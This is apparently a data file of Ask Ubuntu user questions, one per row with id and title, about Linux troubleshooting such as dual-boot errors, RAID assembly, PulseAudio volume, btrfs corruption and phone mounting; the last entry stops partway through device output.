440460	`` reboot or select proper boot device '' error after install ubuntu on win 8 drive	i have a gateway dx4885 machine that came with a new install of windows 8 . upon receiving the computer i did a fresh install of ubuntu 12.04lts desktop , using the format tool in the ubuntu install process . after installing it boots into ubuntu fine , but after a reboot i receive the error message `` reboot or select proper boot device '' . i have done multiple installs in various ways . i have tried the boot-repair tool and it did not do anything . i have also disabled secureboot in the bios . does anyone know a work around for this ?
440465	12.04 `` low disk space '' message	upon boot i consistently receive a low disk space warning informing me that `` filesystem root '' has only xxxmb disk space remaining ; xxx is diminishing with each boot and is getting dangerously low . when i scan the filesystem with disk usage analyzer it shows the total filesystem capacity at 2.0tb ( used : 154.0gb , available : 1.8tb ) . this makes sense to me . however , the ring chart ( and table ) shows the size of / at 153.5gb and warns that it 's at 100 % usage , with the largest files ( those that are causing the so-called 100 % usage ) residing in /home/looie/documents . my partitions are setup with / sized at 14.30gb ( /dev/sda3 ) /home ( on /dev/sda4 ) at 1.8tb . i want my documents to be stored on /home/looie/documents on /dev/sda4 but they appear to also be stored on /home/looie/documents on /dev/sda3 causing the partition to approach it maximum capacity and generate the low disk space warning . what am i doing wrong ? how can i set things up so that my data `` documents '' is stored on the partition with the greatest capacity ( /dev/sda4 ) and not on the smaller partition ( /dev/sda3 ) ? thanks screenshots :
440466	hardware issue when installed dualboot os	i have installed dual-boot os windows and ubuntu 12.04. when i am using ubuntu my laptop is giving heat whereas using windows it 's working fine . please suggest me this issue .
440467	dual booting windows from another hard-drive	i have an old hard-drive with windows 7 and ubuntu 12.04 lts installed which i used to dual boot from . i replaced this hard-drive recently and have only been using ubuntu but i find myself needing to use windows again on the old hdd . after physically re-connecting the old-drive to my motherboard , and then trying to start windows 7 from the boot menu i get a blue-screen of death . i tried starting windows in recovery mode and doing a system restore but this did not resolve my issue . ideally , i would like to be able to remove ubuntu from my old drive , and let each os reside on its own hdd .
440470	conflict between wired and wireless connections	on my main computer ( ubuntu 13.04 ) i use wireless connection to the internet , i have a wireless router in my apartment . when i try to connect my main computer to my old computer ( win xp pro sp # ) with wire , it works fine . i have installed samba on my main computer . but when i am connected to my old computer over the wired connection , i loose connection to the internet through the wireless connection . when i go to systemsettings - > network - > wireless it says the connection is connected . when i disconnect the wired connection i 'm online . what to do ?
440473	acer c720 dualboot with chromeos & ubuntu , boot priority keeping defaulting back to chromeos	first of all , let me highlight that i have a similar problem to the one expressed in this post . i have an acer 720 chromebook that i have installed ubuntu on by following this post . that all worked really well , and ubuntu 13.10 works perfectly . so much so that i 'd really like it to boot directly into ubuntu by default , but i ca n't get it to work . here 's what i did : modified the boot priorities : i ran the following command sudo cgpt add -i 6 -p 5 -s 1 /dev/sda , and then ran sudo cgpt show /dev/sda to make sure it worked which gave me : 2 32 pri gpt table 8671232 3665920 1 label : `` state '' type : linux data uuid : c1c60f06-2e54-ad4d-a7b9-c0da9d89c40d 20480 32768 2 label : `` kern-a '' type : chromeos kernel uuid : 20aa2a08-9440-1243-bae3-2918aa1af66f attr : priority=3 tries=0 successful=1 4476928 4194304 3 label : `` root-a '' type : chromeos rootfs uuid : 6eebefd5-57c3-df41-a820-65184032528c 53248 32768 4 label : `` kern-b '' type : chromeos kernel uuid : ec6a1a3f-0810-914a-962b-d2ba4fc48b18 attr : priority=1 tries=0 successful=1 282624 4194304 5 label : `` root-b '' type : chromeos rootfs uuid : 3645296d-12ba-8a45-958b-1b870cf5497c 12337152 32768 6 label : `` kern-c '' type : chromeos kernel uuid : 0e6d6e52-58ab-2c44-a0d2-d8e4cd7c21b2 attr : priority=5 tries=15 successful=1 12369920 18874368 7 label : `` root-c '' type : chromeos rootfs uuid : a6142347-f6b5-544e-9be3-8f0b1213f57e 86016 32768 8 label : `` oem '' type : linux data uuid : 2b0cbb60-bcef-6649-ad96-214c2c90321e 16450 1 9 label : `` reserved '' type : chromeos reserved uuid : c3a1569e-ef39-8e4f-a21b-6625c4657dfe 16451 1 10 label : `` reserved '' type : chromeos reserved uuid : fe58e26c-e69e-d543-8b97-deadbf64eee6 64 16384 11 label : `` rwfw '' type : chromeos firmware uuid : 9c4b2ba5-80f6-ee43-8e18-efcb67d4d8c9 249856 32768 12 label : `` efi-system '' type : efi system partition uuid : df196d69-dd0b-ef47-80b1-791802868e5e 31277199 32 sec gpt table 31277231 1 sec gpt header as you can see , kern-c is now at the highest priority ( 5 ) so it should boot into this partition . however , when i restarted the chromebook it booted into chromeos instead of ubuntu . running sudo cgpt show /dev/sda again showed that the attributes that i modified before had been overwritten to the default again ( priority 2 instead of 5 ) . does anyone know what 's causing this , and how to fix it ? i guess it has something to do with auto-updating but i 've no idea how to track it down . thanks for your time .
440474	ubuntu 12.04.4 with line 6 toneport ux2	i recently switched from windows to ubuntu and i am using me line 6 toneport ux 2 with it to connect my pc to the mixer the only problem is , i have a strange noise coming from my speakers when i plug the ux2 in and play an instrument at the same time . the guitar is plugged directly into the mixer when i disconnect the ux2 the noise is gone . strangely the pitch of the noise changes with the tone that i play on the guitar and it occasionally goes away for a few seconds . i am not sure what to do about this . -randy
440477	ca n't change unity background after installing mate	i installed mate desktop on my ubuntu , i.e . it had only unity . once i come back to unity , right click > > `` change desktop background '' does nothing system settings > > appearance and choosing a background does not change the background , though it changes the background for the greeter and lock screens seems like the wallpaper is being managed by mate and not by unity , how can i set it back ? i checked that it is taking the background from org.mate.background instead of org.gnome.background . how can i fix that ?
440480	refit menu problem	i just installed ubuntu 13.10 on my macbook retina ( mid 2012 ) with usb . on the installation type , i chose `` install ubuntu along with mac os x '' instead of `` something else '' . however , after installation , there 're 3 options for me to choose on the refit menu : efi/ubuntu/mokmanager.efi efi/ubuntu/grubx64.efi efi/ubuntu/shimx64.efi i can still boot into ubuntu by choosing one of them . how can i fix this to make it shows just one ubuntu logo ?
440481	can i create a shared folder between ubuntu 13.10 and windows 8.1	i have a dual boot system with ubuntu 13.10 and windows 8.1 . at times i can access windows file from ubuntu but not ubuntu files from windows . is there an option to create a shared folder so that i can put the common files in it and access from both ubuntu and windows when necessary
440484	replace password prompts by confirmation	i 'm a little annoyed by having to enter my password too many times ( e.g . while running commands that start with sudo ) . there are ways to completely disable password prompts , e.g . how do i turn off all the password prompts ? however , that is a bit risky for a careless person like me . i want something like windows 7,8 do ; for dangerous actions , they ask for a confirmation where the user just has to click a button . is that possible ? basically i want to replace all the password prompts while i 'm logged in by some sort of 1-click or 1-keypress confirmation . it would be great if the latter alternative works even i 'm logged in over ssh .
440486	evolution , restore mails	i had a hard disk failure , but managed to recover the content of $ home/.local/share , $ home/.config/evolution and $ home/.cache/evolution . found those file locations in `` where are the evolution data files stored ? '' . i created a new installation on another pc , and copied the files to the corresponding locations . when i opened evolution , i saw the mail headers in the inbox folders , double clicked on a mail , and evolution complained about not being able to read the mail . when i closed the message box , the mail headers disappeared . then i opened the sent folder , and saw the expected mail headers , changed to inbox , and back to sent again , and the headers disappeared . when i checked the files , they were gone . tried this a few times more , with the same result . any ideas about what is going on , and how to recover my mails would be highly appreciated .
440488	how to set default order in krusader	i went through all the settings in krusader , yet i was unable to find an option of default order there . i also hoped that when i have enabled save on exit , it will remember my choice , but whenever i open new tab , it sets itself to modified , which i find rather annoying . so is there any possibility how to change it ? thanks for any advice .
440492	gnome shell showing black on some windows	i installed gnome 13.10.04 today and everything it 's ok but there are black areas popping out inside the windows . i ca n't take a screenshot because it appears without those black areas in them . anybody knows something about this issue ?
440494	thinkpad edge e330 refuses to boot from usb after installing ubuntu	before i installed ubuntu my thinkpad edge bios allowed me to specify boot devices , their order etc . now it only says ubuntu in the boot device list . i am thinking this has to do something with uefi but i am not sure what to do exactly . i tried every sensible combination of bios settings but nothing helps . maybe someone had a similar issue .
440503	install problem with broadcom driver -- apparent disk label mismatch	i 'm installing ubuntu 13.10 on an acer laptop which incorporates a broadcom 4312 wifi adapter . when i was running off the live cd ( from the 32 bit download ) i was able to install the required bmcwl-kernel driver from the cd with the `` additional drivers '' app from the software center . everything worked fine . now i 've gone through the install , and i can not install the driver from `` additional drivers ( it simply hangs ) , nor have i been able to use apt-get in any form . apt-get wants files from the installation cd labeled `` ubuntu 13.10 _saucy_salamander_ 386i '' ( or something close -- i 'm going by memory ) , but the installation disk is labeled `` ubuntu 13.10i386 '' , and apparently apt-get ca n't recognize it . i 'm stymied . does anyone know of a work-around ? device is bcm 4312 802.11b/g lp-phy [ 14e4:4315 ] ( rev 01 ) . thanks for the interest .
440504	zfs mirror with two partitions on the same disk , safe ?	i would like to create mirrored partitions on a single disk to protect against bit rot . i understand this will not protect against hardware failure . seeing as zfs is intended to work with drives , could there be any problems with using partitions instead ?
440505	how to avoid sleep mode in ubuntu server 32x	http : //unix.stackexchange.com/questions/25133/ubuntu-server-continuously-goes-to-sleep/25151 # 25151 i try the upper solution to avoid my ubuntu server ( 32x ) to sleep , but now i just ca n't enter it , after i reboot aparently something avoid it enter to the console , it start to boot but do n't end . in my case just shows the console while booting , but the one with very big letters on it and not a chance of write anything on it , like the lines of console who apparead when is turned on , but do n't leave that state . i do n't have any gui installed and i really preffer fix the problem through terminal any question ? please do it thanks in advance ps : i ca n't modify the `` grub '' back like it was before the change , so i ca n't revert the changes done . my version is 12.04
440508	remove all hyperlinks from a spreadsheet	when i copy/paste from a website into gnumeric ( or libreoffice calc ) from a website , i want to be able to quickly strip away all hyperlinks and leave just text . how do i do this ? solutions in either program will be accepted , although gnumeric is preferred .
440515	why is n't md raid assembled after reboot ?	i 'm trying to get an intel raid setup . the problem i have is that after a reboot the raid is not available . these are the steps i go through to setup the intel raid using the mdadm command . i 've followed the steps on http : //www.intel.com/content/dam/www/public/us/en/documents/white-papers/rst-linux-paper.pdf . $ sudo mdadm -- detail-platform platform : intel ( r ) matrix storage manager version : 12.0.0.1783 raid levels : raid0 raid1 raid10 raid5 chunk sizes : 4k 8k 16k 32k 64k 128k 2tb volumes : supported 2tb disks : supported max disks : 6 max volumes : 2 per array , 4 per controller i/o controller : /sys/devices/pci0000:00/0000:00:1f.2 ( sata ) $ cat /proc/mdstat personalities : [ linear ] [ multipath ] [ raid0 ] [ raid1 ] [ raid6 ] [ raid5 ] [ raid4 ] [ raid10 ] unused devices : < none > $ sudo mdadm -- create /dev/md/imsm /dev/sd [ b-c ] -n 2 -e imsm mdadm : container /dev/md/imsm prepared . $ sudo mdadm -- create /dev/md/vol0 /dev/md/imsm -n 2 -l 1 mdadm : can not open device : 11:0 mdadm : array /dev/md/vol0 started . $ cat /proc/mdstat personalities : [ linear ] [ multipath ] [ raid0 ] [ raid1 ] [ raid6 ] [ raid5 ] [ raid4 ] [ raid10 ] md126 : active raid1 sdc [ 1 ] sdb [ 0 ] 1953511424 blocks super external : /md127/0 [ 2/2 ] [ uu ] [ > ... ... ... ... ... ... .. ] resync = 0.4 % ( 8213824/1953511424 ) finish=192.8min speed=168142k/sec md127 : inactive sdc [ 1 ] ( s ) sdb [ 0 ] ( s ) 2210 blocks super external : imsm unused devices : < none > $ sudo mdadm -- examine -- scan -- config=mdadm.conf array metadata=imsm uuid=1b6e3d9e : e14f7906:38f86e54:1f85cdcd array /dev/md/vol0 container=1b6e3d9e : e14f7906:38f86e54:1f85cdcd member=0 uuid=546b601a : ccfa6f04:2cc1d0f5 : aa05edc2 $ sudo vi /etc/mdadm/mdadm.conf $ cat /etc/mdadm/mdadm.conf # mdadm.conf # # please refer to mdadm.conf ( 5 ) for information about this file . # # by default ( built-in ) , scan all partitions ( /proc/partitions ) and all # containers for md superblocks . alternatively , specify devices to scan , using # wildcards if desired . # device partitions containers # auto-create devices with debian standard permissions create owner=root group=disk mode=0660 auto=yes # automatically tag new arrays as belonging to the local system homehost < system > # instruct the monitoring daemon where to send mail alerts mailaddr root # definitions of existing md arrays array metadata=imsm uuid=1b6e3d9e : e14f7906:38f86e54:1f85cdcd array /dev/md/vol0 container=1b6e3d9e : e14f7906:38f86e54:1f85cdcd member=0 uuid=546b601a : ccfa6f04:2cc1d0f5 : aa05edc2 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- i then rebooted here with the raid working =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- $ cat /proc/mdstat personalities : [ linear ] [ multipath ] [ raid0 ] [ raid1 ] [ raid6 ] [ raid5 ] [ raid4 ] [ raid10 ] unused devices : < none > $ sudo mdadm -- assemble -- scan mdadm : container /dev/md/imsm0 has been assembled with 2 drives mdadm : started /dev/md/vol0 with 2 devices $ cat /proc/mdstat personalities : [ linear ] [ multipath ] [ raid0 ] [ raid1 ] [ raid6 ] [ raid5 ] [ raid4 ] [ raid10 ] md126 : active raid1 sdb [ 1 ] sdc [ 0 ] 1953511424 blocks super external : /md127/0 [ 2/2 ] [ uu ] [ > ... ... ... ... ... ... .. ] resync = 4.0 % ( 78945280/1953511424 ) finish=30274.0min speed=1024k/sec md127 : inactive sdc [ 1 ] ( s ) sdb [ 0 ] ( s ) 6306 blocks super external : imsm unused devices : < none > so after running an assemble command the raid is available but why is n't it there after a reboot by default ? the system is running ; distrib_id=ubuntu distrib_release=13.10 distrib_codename=saucy distrib_description= '' ubuntu 13.10 '' $ uname -a linux mdk1 3.11.0-12-generic # 19-ubuntu smp wed oct 9 16:20:46 utc 2013 x86_64 x86_64 x86_64 gnu/linux
440521	remote root access over ssh mount	i am looking for a way to access a remote file system as root , using a protocol like sshfs or fish : // . my goal is to be able to administer files through a gui locally ( e.g . with nautilus or dolphin ) as if they were on the local computer ; and without setting up a share . i 've found a way to elevate privileges immediately , when using ssh ( ssh -t user @ host sudo -s ) . one acceptable answer to my question would be to do something similar with sshfs . another example would be to elevate privilege post-login .
440527	usb installation	i am trying to install/live run ubuntu 12.04.4 on sony vaio tgz laptop . i 've downloaded the iso from the ubntu website . formatted a 16gbit usb drive as 32bit fat . i 've downloaded the uui and run it to install the os on the usb drive . i run the wubi.exe which gives me 3 options : reboot now , reboot later and help with boot from cd . click on any of these and then click finish and then nothing . i have set the laptop to boot from usb first . help , please .
440528	xscreensaver to load at startup ?	greetings i am running ubuntu 12.04 and logging in on ubuntu 3d . wondering if anyone knows the definitive answer to getting xscreensaver to load at start-up ? i have removed gnome screensaver , installed xscreensaver with no results . i have tried adding start-up applications : > xscreensaver ânosplash ( with no results ) also executed : sudo gedit /etc/xdg/autostart/screensaver.desktop with is output : > [ desktop entry ] > > exec=xscreensaver > > name=xscreensaver > blockquote > > type=application > > x-kde-startupnotify=false ( with no results ) also when i manually open the screensaver i get this error : the xscreensaver daemon does n't seem to be running on `` :0 '' . launch it now ? i have also tried following the instructions here ( top answer ) any help is appreciated .
440529	how to install glibc 2.12 or 2.14 on ubuntu 12.04 ?	i am making a jni call to a c++ library and it is compiled in glibc v2.12 or v2.14 , but ubuntu 12.04 has glibc 2.15 . whenever i make a call to the c++ library i get the error glibc 2.14 not found . how do i go about installing glibc 2.12/2.14 ?
440531	disable `` hover click '' in 13.10 saucy	trying to disable `` hover click '' entirely . settings manager- > onboard settings - > universal access brings me to : universal access hover click delay : 3.00 -+ motion threshold : 30 -+ _ hide hover click window i understand in earlier versions , there was an option on the above to turn off hover-click . has it disappeared in this os version ? some way to hack it ? ( in my opinion it should only be on for souls trapped in dante 's inferno ) thanks
440532	run custom user interface application	i have written a java program that i use as an information screen in a public location . it 's a simple program that fetches some xml data from a web server and displays it as scrolling text . i would like to completely replace the ubuntu gui with this program . i know that i can simply make it a startup application and enable automatic login , but i would very much prefer to bypass lightdm altogether . is there some way to accomplish this ?
440535	wired connection fails after ethernet was unplugged and plugged back in	i 'm running ubuntu 12.04 x64 on an acer aspire one 722-bz454 . os was installed a short few days ago . yesterday , i unplugged the ethernet cable to take the netbook outside for a few hours . came back in , plugged the ethernet in again , everything worked fine as normal . a couple hours later , i noticed horrible lag on my desktop , with nothing using data . check the netbook , and see the connection is absolutely maxed out . being hasty , i simply unplugged the ethernet cable and went about my business . some time later , i decided to plug it back in and see what was using all of that bandwidth , only to find that i could no longer get a wired connection . all configuration checks out , as far as i can tell , but ubuntu just keeps trying to connect and failing , with the message : wired network disconnected - you are now offline i have a separate windows 7 partition , and decided to see if the situation was any clearer over there , only to find that i can not connect to the internet there , either . i can , however , still see all other devices ( laptop , desktop , etc ) on the network and access their shared files perfectly fine . dmesg returns only : [ 9.894869 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 27.871448 ] atl1c 0000:06:00.0 : atl1c : eth0 nic link is up < 100 mbps full duplex >
440537	what is the good way to remove sdk and other soft ?	i have installed amd-app-sdk-v2.9 using install script : ./install-amd-app.sh everything is ok and here is the installation log : 1 ) starting installation of amd appsdk v2.9 ... . 2 ) 64-bit operating system found ... 3 ) version information available in versioninfo.txt 4 ) untar command executed succesfully , the sdk package available 5 ) untar command executed succesfully , the icd package available 6 ) sdk binaries/source/samples/other files copying to = /opt/amdapp 7 ) sdk files copied successfully at /opt/amdapp/ 8 ) copying the opencl runtime files to system ... 9 ) updating environment variables ... 10 ) updating ld_library_path in /etc/profile 11 ) environment variables updated successfully 12 ) initialize global environment variables ... 13 ) global environment variables initialized 14 ) amd app installation completed 15 ) reboot required to reflect the changes so , i understand it as follows : binary files are copied to /opt/amdapp/ folder , some env variables are set and so on . i 'm wondering , how to remove this sdk ? should i just remove /opt/amdapp/ folder and destroy ld_library_path ? or i should do some extra things ? i mean how to remove installed software not via dpkg from my system in general and in this case in particularly .
440539	how to save/reinstall ubuntu without liveusb	been using ubuntu for years , consider myself kind of an advanced user , and i assure you i have spent the better half of the day trying things and googling around . here 's what happened : upgraded my 64bit 13.10 to 14.04 this afternoon ( upgrade , not a fresh install ) on a lenovo x1 carbon which had previously worked flawlessly out of the box . the first restart upon finished installation/upgrade rendered my machine unusable : - i see no bios/lenovo screen upon powering on the machine - screen stays blank ( hd activity , screen is lit ) what i can do : - plug a hdmi cord into the machine and use the laptop from my tv . laptop screen stays blank what i ca n't do ( and here is where it gets weird ) : - i can not boot a live usb installation . either because it just does n't work , or it works but i do n't see anything ( because of the blank screen ) . at any rate , even if it works ( which i can not tell ) , in that option the 2nd screen is n't on . how can i reset/reinstall my complete os if i cant do a from-usb-installation ? is there a way ( scripts , terminal commands etc ) to reset all the boot parameters , grub , graphics drivers etc ... ? how would i roll back to 13.10 ? so i am basically running a current daily 14.04 help is much much apprciated . i am totally frustrated , i have no backup laptop to take to work with
440541	unable to boot disk	i recently disabled secure boot and uefi boot because a lot of disks i burned would n't work on my laptop . i 've decided to stick with linux instead of windows ever since i tried kali linux , and i wanted to give ubuntu a go . i 'm very new with linux os though , and when i boot from the dvd i burned , which i 've never failed to burn a dvd , and kali linux runs on it just fine . anyways , when i go to run it , it will bring up the ubuntu purple screen like normal , then the loading screen , then it 'll flash a screen and instantly turn pure black without loading , and i leave it for like 30 minutes and it still just at the pure black screen with no light on it , but i tested it on another laptop and it works on there . i 'm attempting to burn 2 more disks to see if this one does n't match my hardware or something , but like i said i 'm really new to linux and i do n't think i can continue to use windows for much longer ... not a big fan of microsoft , so please any suggestions would be nice .
440542	how to change process priority	i want to change the priority of a process on my ubuntu 12.04 desktop , but i ca n't . i go into an app called `` system monitor '' , right click the process , and change the priority to `` high '' . i then get this message : `` can not change the priority of process with pid 4364 to -5 . permission denied . '' i have tried to give myself root . what does this mean , and is there a more acute way to change the priority ?
440544	ubuntu 13.10 and radeon hd 7470m	im running ubuntu 13.10 with radeon hd 7470m . i have installed fglrx and it is working ... in some way . when i have only monitor of my laptop - a black screen apears . i mean i can see tty1 ( console or something ) for sec but it dissapears . it seems like monitor gets disconnected . i can hear linux sounds tho ( when login screen apears ) . ctrl+alt+1 etc does nothing . now when i connect 2nd monitor weird thing happens . it display normal screen . i can login and use system as i want . the thing is i cant get laptop monitor running in any way . i tried system settings and amdcccle ... nothing seems to help . but it is detected by both ... how come its not displaying anything ? not even is `` brigthened '' - just like it was completly disabled . it is not damaged - if i uninstall fglrx and use open source drivers - everything is working but it really slow ( not hardware problem , windows was running it fine ) . any idea how can i get laptop screen working with fglrx ? thanks in advance .
440546	no wireless network after successful wnda3100v2 driver install	i have followed the answer from oct 28 '11 at 17:59 given by hans verboven 212 and verified each step , except when i reboot and plug in the adaptor it doesnt flash and the net manager still sees no wireless network . true for 2 wnda3100v2 wireless adaptors , both of which work fine in other win machines . thi one is dell dimension 3000.wired net works ok . thanks in advance for your help !
440548	got a corrupt btrfs partition , but is still usable , how to convert it to ext4 ?	i 've got a corrupt btrfs partition , and also because of its low speed , i am thinking of 'converting ' it to ext4 , how can i convert a root partition from btrfs to ext4 without loosing the ability to boot , .. i am willing to do it manually , but i am not sure how to do it , or is there a better option ? # btrfsck /dev/sda1 root 257 inode 3064 errors 400 root 257 inode 43998 errors 400 root 257 inode 44001 errors 400 root 257 inode 44003 errors 400 root 257 inode 44007 errors 400 root 257 inode 100607 errors 400 found 1677811712 bytes used err is 1 total csum bytes : 1430484 total tree bytes : 201265152 total fs tree bytes : 186617856 btree space waste bytes : 51677064 file data blocks allocated : 1636151296 referenced 2796367872 btrfs btrfs v0.19 /etc/fstab # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda1 during installation uuid=f46eee48-3256-4e22-9928-4743074ba775 / btrfs defaults , subvol= @ , compress-force 0 1 # /home was on /dev/sda1 during installation uuid=f46eee48-3256-4e22-9928-4743074ba775 /home btrfs defaults , subvol= @ home , compress-force 0 2 /dev/fd0 /media/floppy0 auto rw , user , noauto , exec , utf8 0 0 this will not work , since it was a btrfs partition all along : how can i convert my root partition from btrfs to ext4 ?
440549	ubuntu 13.10 very big issue	about a minute after logging into my pc , after installing 13.10 saucy salamander from precise pangolin , i am unable to click on any window , or move any window , or click on anything in any window , or click on the unity launcher , or the taskbar . effectively , my computer becomes completely useless . it seems as though logging out and logging back in ( not restarting ) solves it , but i could be wrong , as it only worked the one time ( being this time ) , and i accessed the logout command by complete chance . my computer would otherwise not working . i fear that there is n't any kind of fix for what i have , as i 've searched and nothing has come up for my issue . if there is , that 'd be great , and i 'd embrace your answer . if there is n't , like i had imagined initially , is there a way for me to downgrade my version back down to 13.04 ? i do n't feel like dealing with the headache of this problem if there is n't a fix for it . as well , i 'm a little bit of a linux newbie , and i do n't really know much of what i 'm doing with it . i thank you kindly .
440556	ubuntu not doing anything on startup	i installed ubuntu 12.04.4 lts on a virtualbox on my windows 7 pc . it has 1 gb of ram allocated and a 25 gb vdi . when i restarted the machine after install i got a screen to select the boot device , but after i make a selection i get a black screen with an underscore in the top right .
440562	pulseaudio : loopback decreases volume ?	i 'm trying to set up pulseaudio for some streaming , and i thought i had it set up correctly . apparently i was wrong . i was having some issues with volume in my setup , so i decided to start from scratch . after running the below commands , any input ( program ) attached to `` stream_spkr '' comes out at a low volume , probably about half of what it is supposed to be . the created sink is at 100 % volume : pacmd insert-module module-null-sink sink_name=stream_spkr sink_properties=device.description=sink_spkr pacmd insert-module module-loopback source=stream_spkr.monitor sink=alsa_output.pci-0000_00_1b.0.analog-stereo i deleted the loopback and used ffplay -f pluse -i stream_spkr.monitor to play the input from the null-sink over my speakers , and it 's at full volume . this leads me to believe that it is , in fact , the loopback causing the issue . any pulseaudio gurus here ? i ca n't for the life of me figure out what the problem is . i checked the module options in pulseaudio 's documentation and there does n't seem to be any options for volume so i must be missing something . edit : upon further investigation , pacmd shows that the loopback volume is , indeed , 36 % : index : 37 driver : < module-loopback.c > flags : variable_rate start_corked state : running sink : 1 < alsa_output.pci-0000_00_1b.0.analog-stereo > volume : 0 : 36 % 1 : 36 % 0 : -26.62 db 1 : -26.62 db balance 0.00 muted : no current latency : 35.78 ms requested latency : 66.67 ms sample spec : s16le 2ch 44100hz channel map : front-left , front-right stereo resample method : speex-float-1 module : 35 properties : media.role = `` abstract '' module-stream-restore.id = `` sink-input-by-media-role : abstract '' media.name = `` loopback from monitor of stream_spkr_sink '' media.icon_name = `` audio-input-microphone '' why would it start a loopback at 36 % volume , and how can i override that ?
440563	no progress bars are moving whatsoever	throughout the entire operating system , progress bars will not work . examples : downloading software from software center - > progress bar stays at beginning and says downloaded 0 bits of 125kbs - > progress bar wo n't move and text wo n't change until it says applying changes downloading software from terminal - > stays on 0 % downloading from http : //archive.ubuntu.com yada yada yada - > does the same as software center and does n't move until software is downloaded software updater - > progress bar does n't start moving until it 's 5-10 minutes in things i have tried : clean slate installation updating os
440566	how to add ubuntu 13.10 to windows boot manager when easybcd will not work ?	basically i am having difficulty adding ubuntu to my windows boot manager . i have downloaded easybcd and followed the steps to add it yet it insists that the files are not there . here are the steps i followed : 1 ) install windows 7 pro 2 ) install ubuntu 13.10 from a disk , custom partitions : ext 4 ( 30gb ) mounted to \ swap ( 10gb ) 3 ) download and install easybcd 4 ) click add new entry 5 ) select linux , grub 2 6 ) went to select drive and where i should have an ext4 format drive it says hfs+ 7 ) chose this one anyway as that is where grub2 should be 8 ) when booting it can not find the file `` autoneogrub0.mbr '' in the nst folder are there any other methods i can try as i 'd really like to get this working asap becuase i have programming coursework to do . cheers
440571	mtp mount fails of samsung galaxy s4 on 13.10 on lenovo t440	when i connect my samsung galaxy s4 active to my lenovo t440 running 13.10 , the device is detected and i 'm offered to look at in files . when i first upgraded , it would work about 50 % of the time . now all the time the directory is shown in files as empty . i am offered the eject button , which does eject it , but no amount of remounts will allow me to see the files on the phone . [ hmm screenshot of this deleted as i do n't have reputation points ] if i eject and then try mtp-detect i get : > mtp-detect unable to open ~/.mtpz-data for reading , mtpz disabled.libmtp version : 1.1.6 listing raw device ( s ) device 0 ( vid=04e8 and pid=6860 ) is a samsung galaxy models ( mtp ) . found 1 device ( s ) : samsung : galaxy models ( mtp ) ( 04e8:6860 ) @ bus 2 , dev 16 attempting to connect device ( s ) at this point it hangs forever . the usb device is definitely connected : > lsusb -v bus 002 device 016 : id 04e8:6860 samsung electronics co. , ltd gt-i9100 phone [ galaxy s ii ] , gt-i9300 phone [ galaxy s iii ] , gt-p7500 [ galaxy tab 10.1 ] device descriptor : blength 18 bdescriptortype 1 bcdusb 2.00 bdeviceclass 0 ( defined at interface level ) bdevicesubclass 0 bdeviceprotocol 0 bmaxpacketsize0 64 idvendor 0x04e8 samsung electronics co. , ltd idproduct 0x6860 gt-i9100 phone [ galaxy s ii ] , gt-i9300 phone [ galaxy s iii ] , gt-p7500 [ galaxy tab 10.1 ] bcddevice 4.00 imanufacturer 1 samsung iproduct 2 samsung_android iserial 3 59c264f2 bnumconfigurations 2 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 39 bnuminterfaces 1 bconfigurationvalue 1 iconfiguration 0 bmattributes 0xc0 self powered maxpower 96ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 3 binterfaceclass 6 imaging binterfacesubclass 1 still image capture binterfaceprotocol 1 picture transfer protocol ( pima 15470 ) iinterface 5 mtp endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x01 ep 1 out bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 1 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x82 ep 2 in bmattributes 3 transfer type interrupt synch type none usage type data wmaxpacketsize 0x001c 1x 28 bytes binterval 6 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 105 bnuminterfaces 3 bconfigurationvalue 2 iconfiguration 0 bmattributes 0xc0 self powered maxpower 96ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 3 binterfaceclass 6 imaging binterfacesubclass 1 still image capture binterfaceprotocol 1 picture transfer protocol ( pima 15470 ) iinterface 5 mtp endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x01 ep 1 out bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 1 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x82 ep 2 in bmattributes 3 transfer type interrupt synch type none usage type data wmaxpacketsize 0x001c 1x 28 bytes binterval 6 interface association : blength 8 bdescriptortype 11 bfirstinterface 1 binterfacecount 2 bfunctionclass 2 communications bfunctionsubclass 2 abstract ( modem ) bfunctionprotocol 1 at-commands ( v.25ter ) ifunction 8 cdc serial interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 1 balternatesetting 0 bnumendpoints 1 binterfaceclass 2 communications binterfacesubclass 2 abstract ( modem ) binterfaceprotocol 1 at-commands ( v.25ter ) iinterface 6 cdc abstract control model ( acm ) cdc header : bcdcdc 1.10 cdc call management : bmcapabilities 0x00 bdatainterface 2 cdc acm : bmcapabilities 0x02 line coding and serial state cdc union : bmasterinterface 1 bslaveinterface 2 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x84 ep 4 in bmattributes 3 transfer type interrupt synch type none usage type data wmaxpacketsize 0x0010 1x 16 bytes binterval 9 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 2 balternatesetting 0 bnumendpoints 2 binterfaceclass 10 